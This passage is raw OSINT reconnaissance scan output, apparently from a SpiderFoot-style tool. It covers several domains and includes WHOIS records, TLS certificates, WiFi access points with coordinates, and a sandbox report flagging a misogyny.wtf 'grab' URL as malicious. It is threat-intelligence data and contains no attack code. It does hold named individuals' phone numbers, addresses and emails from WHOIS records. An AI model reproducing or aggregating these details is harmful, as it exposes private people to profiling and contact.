SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-47776-311-004D9E24'}, {u'category': u'Environment Awareness', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-31', u'name': u'Possibly tries to detect the presence of a debugger', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 1, u'description': u'GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-144-004DC170\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-781-00456F99\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-562-0051F380\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-252-00401E3C\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-781-00456F99\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-252-00401E3C\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-562-0051F380\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-144-004DC170'}, {u'category': u'Environment Awareness', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-3', u'name': u'Contains ability to query the machine version', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 1, u'description': u'GetVersionExA@KERNEL32.DLL at 00011898-00002812-52256-850-00414354\n GetVersionExA@KERNEL32.DLL at 00011898-00002812-47776-850-00414354'}, {u'category': u'Envir 81.88.48.101 2022-12-18 00:08:39 Netblock Membership No RIPE 0 0 2 0 None 188.114.97.0/24 188.114.97.9 2022-12-18 00:09:48 Co-Hosted Site No HackerTarget 0 0 2 0 None autodiscover.webelievenow.com 172.67.147.230 2022-12-18 00:13:49 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None contact@vosdomaines.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: tain.fr status: ACTIVE eppstatus: active hold: NO holder-c: SC54767-FRNIC admin-c: SC54767-FRNIC tech-c: K6635-FRNIC registrar: KIFCORP Expiry Date: 2023-03-01T08:35:38Z created: 2021-03-01T08:35:38Z last-update: 2022-03-01T08:36:40Z source: FRNIC nserver: ns1.alpesc.net nserver: ns2.alpesc.net source: FRNIC registrar: KIFCORP address: 78 RUE D ALEMBERT address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr website: https://www.kifdom.com/faq.php anonymous: No registered: 2014-12-22T00:00:00Z source: FRNIC nic-hdl: SC54767-FRNIC type: PERSON contact: Sebastien Chevillet address: 10 Rue de Penthievre address: 75008 Paris country: FR phone: +33.768936738 e-mail: contact@vosdomaines.com registrar: KIFCORP changed: 2022-10-17T08:04:47.27595Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRAR eligdate: 2021-06-25T00:00:00Z reachstatus: ok reachmedia: email reachsource: REGISTRAR reachdate: 2021-06-25T00:00:00Z source: FRNIC nic-hdl: K6635-FRNIC type: ORGANIZATION contact: KIFCORP address: KIFCORP address: 78 rue d'Alembert address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr registrar: KIFCORP changed: 2022-12-16T10:49:00.573083Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRY eligdate: 2021-08-10T00:00:00Z reachstatus: ok reachmedia: phone reachsource: REGISTRY reachdate: 2021-08-10T00:00:00Z source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.695058Z <<< 2022-12-18 00:16:27 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.97.9:443 188.114.97.9 2022-12-18 00:05:37 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:6b:c5:5a:1c:aa:de:11:25:3a:85:ac:27:46:ac:84:c2:a9 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Oct 30 18:19:31 2022 GMT Not After : Jan 28 18:19:30 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:01:01:6e:30:77:4b:4a:76:be:97:94:3e:d7:af: bb:89:fe:9f:c9:f2:e8:ed:d4:13:6a:74:bb:54:79: b8:27:6d:90:01:e0:be:5d:f9:e8:61:3e:d3:8e:13: 0b:c0:e3:b9:e9:81:3b:d6:d1:80:50:6a:0e:80:e2: e7:bc:d5:ec:5b ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: E9:2C:D8:38:4D:A7:AE:7E:D2:DB:0C:69:89:B1:06:B2:70:BB:A0:0E X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A: B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A Timestamp : Oct 30 19:19:31.817 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:C2:6E:51:36:59:0D:CE:4E:3E:93:68: B7:52:EC:0D:A3:64:2B:FD:C3:C4:8C:29:56:48:6F:95: D8:9B:CC:44:7E:02:21:00:A2:B2:75:BE:13:EC:DD:76: EA:96:1F:2A:6C:6E:0E:29:82:80:17:3E:47:9C:8E:92: E5:65:93:C4:F2:40:9A:71 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84: 16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52 Timestamp : Oct 30 19:19:32.193 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:58:09:E2:75:44:09:65:23:B2:E8:98:E6: 5A:29:54:61:82:95:46:00:CC:4C:F0:F9:75:C2:3F:A5: 20:BE:5C:FD:02:21:00:BC:37:0D:50:7B:FC:62:A0:53: CB:E3:BC:93:1D:7A:F7:27:61:EE:FD:A6:22:E2:B7:5C: 9C:92:5D:B4:96:27:43 Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:04:21:99:c1:62:18:bd:99:25:98:f3:0c:ca:ce: c8:fa:2f:2a:31:b9:ea:b2:99:10:e6:57:f5:a3:23:3e:4a:7a: 6c:1b:7d:1c:44:fc:03:e0:1b:b9:12:63:2a:17:e0:2b:02:31: 00:82:f7:ce:ac:f5:55:93:8a:ec:a8:8e:16:25:5c:d9:5d:e8: d7:c6:c8:55:62:11:95:88:6a:34:10:9e:9e:60:7c:a3:0a:c9: 2f:24:b4:3b:7c:64:b2:4c:da:28:fd:b7:44 plague.fun 2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:6b:c5:5a:1c:aa:de:11:25:3a:85:ac:27:46:ac:84:c2:a9 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Oct 30 18:19:31 2022 GMT Not After : Jan 28 18:19:30 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:01:01:6e:30:77:4b:4a:76:be:97:94:3e:d7:af: bb:89:fe:9f:c9:f2:e8:ed:d4:13:6a:74:bb:54:79: b8:27:6d:90:01:e0:be:5d:f9:e8:61:3e:d3:8e:13: 0b:c0:e3:b9:e9:81:3b:d6:d1:80:50:6a:0e:80:e2: e7:bc:d5:ec:5b ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: E9:2C:D8:38:4D:A7:AE:7E:D2:DB:0C:69:89:B1:06:B2:70:BB:A0:0E X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A: B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A Timestamp : Oct 30 19:19:31.817 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:C2:6E:51:36:59:0D:CE:4E:3E:93:68: B7:52:EC:0D:A3:64:2B:FD:C3:C4:8C:29:56:48:6F:95: D8:9B:CC:44:7E:02:21:00:A2:B2:75:BE:13:EC:DD:76: EA:96:1F:2A:6C:6E:0E:29:82:80:17:3E:47:9C:8E:92: E5:65:93:C4:F2:40:9A:71 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84: 16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52 Timestamp : Oct 30 19:19:32.193 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:58:09:E2:75:44:09:65:23:B2:E8:98:E6: 5A:29:54:61:82:95:46:00:CC:4C:F0:F9:75:C2:3F:A5: 20:BE:5C:FD:02:21:00:BC:37:0D:50:7B:FC:62:A0:53: CB:E3:BC:93:1D:7A:F7:27:61:EE:FD:A6:22:E2:B7:5C: 9C:92:5D:B4:96:27:43 Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:04:21:99:c1:62:18:bd:99:25:98:f3:0c:ca:ce: c8:fa:2f:2a:31:b9:ea:b2:99:10:e6:57:f5:a3:23:3e:4a:7a: 6c:1b:7d:1c:44:fc:03:e0:1b:b9:12:63:2a:17:e0:2b:02:31: 00:82:f7:ce:ac:f5:55:93:8a:ec:a8:8e:16:25:5c:d9:5d:e8: d7:c6:c8:55:62:11:95:88:6a:34:10:9e:9e:60:7c:a3:0a:c9: 2f:24:b4:3b:7c:64:b2:4c:da:28:fd:b7:44 2022-12-18 00:17:08 SSL Certificate - Issued to No SSL Certificate Analyzer 0 0 2 0 None C=IT,ST=Firenze,O=Register S.p.A.,CN=*.amen.fr webmail.zerotwo-best-waifu.online 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) 37.7803446,-122.3906132 2022-12-18 00:07:06 HTTP Status Code No Web Spider 0 0 2 0 None 200 http://misogyny.wtf:2020/copy 2022-12-18 00:14:46 HTTP Status Code No Web Spider 0 0 2 0 None 301 http://rasputain.fr/ 2022-12-18 00:31:00 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.chat plague.fun 2022-12-18 00:05:13 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.226.83.185:80"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ca8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ca8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3240"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ca8_ConnHashTable<3240>_HashTable_Mutex"\n "IsoScope_ca8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_ca8_IESQMMUTEX_0_331"\n "IsoScope_ca8_IE_EarlyTabStart_0x91c_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3240"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "G860FG14.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G860FG14.txt]- [targetUID: 00000000-00003240]\n Dropped file: "EWM9224B.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM9224B.txt]- [targetUID: 00000000-00003240]\n Dropped file: "3LR45Z23.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3LR45Z23.txt]- [targetUID: 00000000-00003240]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "~DF66C2219AA8EED58C.TMP" has type "data"- Location: [%TEMP%\\~DF66C2219AA8EED58C.TMP]- [targetUID: 00000000-00003240]\n "_FA9E4B4C-7574-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "G860FG14.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G860FG14.txt]- [targetUID: 00000000-00003240]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "EWM9224B.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM9224B.txt]- [targetUID: 00000000-00003240]\n "~DF3C52B6399075EFBC.TMP" has type "data"- Location: [%TEMP%\\~DF3C52B6399075EFBC.TMP]- [targetUID: 00000000-00003240]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "3LR45Z23.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3LR45Z23.txt]- [targetUID: 00000000-00003240]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003240]\n "_9A913025-7572-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFD4AE018E87DABDD4.TMP" has type "data"- Location: [%TEMP%\\~DFD4AE018E87DABDD4.TMP]- [targetUID: 00000000-00003240]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._9A913023-7572-11ED-9F98-0800274F8D7F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"misogyny.wtf" seems to be random'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://misogyny.wtf/grab/UsRjS959Rqm4sPG4"\n Pattern match: "http://misogyny.wtf"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'10/91 Antivirus vendors marked sample as malicious (10% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'638f5a030d35cf1e924e752e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'20.226.83.185'], u'sha256': u'33c924af831ebf0a78a69b3c46d21ee130387cbefb922390d78c5dcf642b6f61', u'sha512': u'93acf54f3244d24de431cea4c1df9c9e8bebb2019266f177c1197d434b21cc1f4a49196b7c7b592d395b5609c23630025100a7435b58b6e027edf7a8eb372375', u'image_file_characteristics': [], u'submissions': [{u'url': u'http://misogyny.wtf/grab/UsRjS959Rqm4sPG4', u'submission_id': u'638f5a040d35cf1e924e752f', u'created_at': u'2022-12-06T15:04:36+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-06T15:04:36+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 5, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'70c5a18bdec227528eed1b20f93b6aa1', u'network_mode': u'default', u'processes': [], u'sha1': u'7761d83a3b60cb69d52f94b37206195f0f04469d', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'misogyny.wtf'], u'extracted_files': [], u'type_short': []}] 20.226.83.185 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None herron-libson (Net ID: 00:01:24:F1:75:B2) 37.7803446,-122.3906132 2022-12-18 00:08:30 Physical Location No LeakIX 0 0 1 0 None Amsterdam, North Holland, Netherlands plague.fun 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None dabancolvalidat.dabancolvalidat.repl.co 34.149.204.188 2022-12-18 00:13:41 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None administration@nordnet.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: wanadoo.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: BLF14-FRNIC registrar: NORDNET Expiry Date: 2023-09-06T11:03:56Z created: 1995-09-12T22:00:00Z last-update: 2022-10-31T23:07:53.716977Z source: FRNIC nserver: ns1.orange.fr nserver: ns2.orange.fr nserver: ns3.orange.fr nserver: ns4.orange.fr source: FRNIC registrar: NORDNET address: 20 Rue Denis Papin address: CS 20458 address: 59664 VILLENEUVE D'ASCQ CEDEX country: FR phone: +33.969360360 e-mail: administration@nordnet.com website: https://www.nordnet.com/offres/pack_relais/presentation.php anonymous: No registered: 1997-12-29T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC nic-hdl: BLF14-FRNIC type: PERSON contact: Beatrice Leopold Fenu address: 78 Olivier de Serres address: 75015 Paris country: FR phone: +33.145298193 fax-no: +33.144440181 e-mail: gestionndd@francetelecom.biz registrar: NORDNET changed: 2018-01-09T13:39:00Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:10:59.299088Z <<< 2022-12-18 00:09:29 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'81.88.52.232', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'Apache', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731394c10605e8f0c992595628f26a0847afa04046f0d8421bc', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'39 Fabulous DIY Christmas Gift Baskets That Looks Expensive \u2014 Offbeatbros', u'url': u'', u'header': {u'server': u'Apache'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_256_GCM_SHA384', u'jarm': u'2ad2ad16d2ad2ad00042d42d0000006a78f6757b72f02e234bb3f6d2d5740b', u'certificate': {u'domain': [u'fortheprnc.space', u'www.fortheprnc.space'], u'cn': u'fortheprnc.space', u'valid': True, u'not_after': u'2023-01-31T12:46:07Z', u'key_size': 2048, u'issuer_name': u'R3', u'fingerprint': u'c118c230751a6a4fdb45a44071bed4d5b65971e28f4fe3d296c4b44446a14374', u'key_algo': u'RSA', u'not_before': u'2022-11-02T12:46:08Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'fortheprnc.space', u'summary': u'Date: Wed, 02 Nov 2022 14:11:39 GMT\r\nServer: Apache\r\nUpgrade: h2,h2c\r\nConnection: Upgrade, close\r\nVary: Accept-Encoding,User-Agent\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n\nPage title: 39 Fabulous DIY Christmas Gift Baskets That Looks Expensive \u2014 Offbeatbros', u'time': u'2022-11-02T14:11:38.188064081Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'81.88.52.232', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'Register S.p.A.', u'asn': 39729, u'network': u'81.88.48.0/20'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'Apache', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731394c10608876b8ae918d993f3ce3e4d3d4b4c6ec02156b7c', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'302 Found', u'url': u'', u'header': {u'content-length': u'209', u'location': u'https://fortheprnc.space/', u'server': u'Apache'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'IT', u'city_name': u'', u'location': {u'lat': 43.1479, u'lon': 12.1097}, u'country_name': u'Italy', u'continent_name': u'Europe', u'region_name': u''}, u'host': u'fortheprnc.space', u'summary': u'Date: Wed, 02 Nov 2022 14:11:37 GMT\r\nServer: Apache\r\nLocation: https://fortheprnc.space/\r\nContent-Length: 209\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\nPage title: 302 Found\n\n\n\n302 Found\n\n

Found

\n

The document has moved here.

